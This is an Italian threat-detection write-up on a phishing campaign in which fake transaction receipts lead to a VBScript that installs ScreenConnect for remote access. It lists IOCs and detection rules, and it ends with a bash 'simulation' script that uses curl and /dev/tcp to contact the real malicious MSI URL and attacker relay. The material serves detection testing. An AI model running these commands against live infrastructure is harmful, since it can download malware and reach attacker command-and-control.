Malware Phishing/Truffa: Email di Phishing Nascoste come Ricevute di Transazione
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Gli attori delle minacce stanno inviando email di phishing che impersonano dipendenti di aziende statunitensi e includono allegati mascherati da ricevute di transazione. L’attacco utilizza un PDF dannoso per indurre gli utenti a scaricare un presunto aggiornamento di Adobe Flash Player che in realtà avvia un VBScript. Lo script quindi installa il legittimo strumento di gestione remota ScreenConnect per stabilire un accesso remoto persistente per attività successive.
Indagine
AhnLab Security Intelligence Center (ASEC) ha identificato la campagna esaminando il contenuto delle email di phishing e il comportamento del PDF allegato. L’indagine ha tracciato la catena di esecuzione dal VBScript dannoso al recupero del payload in background e all’installazione silenziosa di un pacchetto MSI utilizzando curl.exe and msiexec.exe.
Mitigazione
Gli utenti dovrebbero essere addestrati a riconoscere i tentativi di phishing che coinvolgono ricevute di transazione inattese e inviti a installare aggiornamenti software come Adobe Flash Player. Le organizzazioni dovrebbero limitare l’esecuzione di VBScript e monitorare l’uso non autorizzato di strumenti di gestione remota inclusi ScreenConnect. La lista bianca delle applicazioni può anche aiutare a prevenire l’esecuzione di pacchetti MSI sconosciuti o non approvati.
Risposta
Se viene rilevata un’attività dannosa, il sistema interessato dovrebbe essere isolato immediatamente per evitare l’accesso remoto tramite ScreenConnect. I risponditori dovrebbero terminare le sessioni attive associate a relay.Gamedbd.Com l’infrastruttura e controllare il registro per le informazioni di sessione memorizzate. Un’indagine forense completa dovrebbe anche determinare se è avvenuto movimento laterale o esfiltrazione di dati tramite lo strumento di gestione remota.
Flusso dell’attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
LOLBAS WScript / CScript (via process_creation)
Software Alternativo di Accesso Remoto / Gestione (via process_creation)
Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (via proxy)
Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (via dns)
IOC (HashMd5) per rilevare: Malware Phishing/Scam: Email di Phishing mascherate da Ricevute di Transazione
Rilevamento di Email di Phishing mascherate da Ricevute di Transazione [Proxy]
Email di Phishing che Impersonano Ricevute di Transazione Portano all’Installazione di Pacchetti MSI [Creazione del Processo Windows]
Esecuzione di Simulazione
Prerequisito: Il Controllo Preliminare di Telemetria e Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa dell’Attacco & Comandi: L’avversario avvia una campagna di phishing inviando un’email riguardante una transazione fallita. Il link indirizza la vittima a
https://transaction-sucessful.vercel.app, che ospita una finta ricevuta. Quando la vittima clicca su “Scarica Ricevuta”, il browser tenta di recuperarehttps://payment-six-eta.vercel.app/doc/sc.msi. Una volta eseguito il payload, tenta di stabilire una sessione di accesso remoto collegandosi al relay ScreenConnect arelay.gamedbd.com:8041. Questa sequenza testa sia il rilevamento basato su URL sia quello basato su dominio/porta. -
Script di Test di Regressione:
#!/bin/bash # Script di simulazione per attivare la regola di rilevamento Phishing/ScreenConnect echo "[+] Avvio Simulazione: Test di Rilevamento Phishing/ScreenConnect" # 1. Simula il download del MSI dannoso dall'URL Vercel echo "[+] Passo 1: Simulazione connessione all'URL Vercel dannoso..." curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi" # 2. Simula la connessione al dominio/porta specifico del relay ScreenConnect echo "[+] Passo 2: Simulazione connessione al relay ScreenConnect dannoso..." # Utilizziamo /dev/tcp per simulare un tentativo di connessione senza necessità di un listener reale timeout 2 bash -c 'cat < /dev/null > /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null echo "[+] Simulazione Completata. Verifica gli avvisi nel SIEM." -
Comandi di Cleanup:
# Nessun artefatto persistente è creato da questa simulazione basata su rete. # Se sono stati scaricati file locali, devono essere rimossi: rm -f sc.msi echo "[+] Cleanup completato."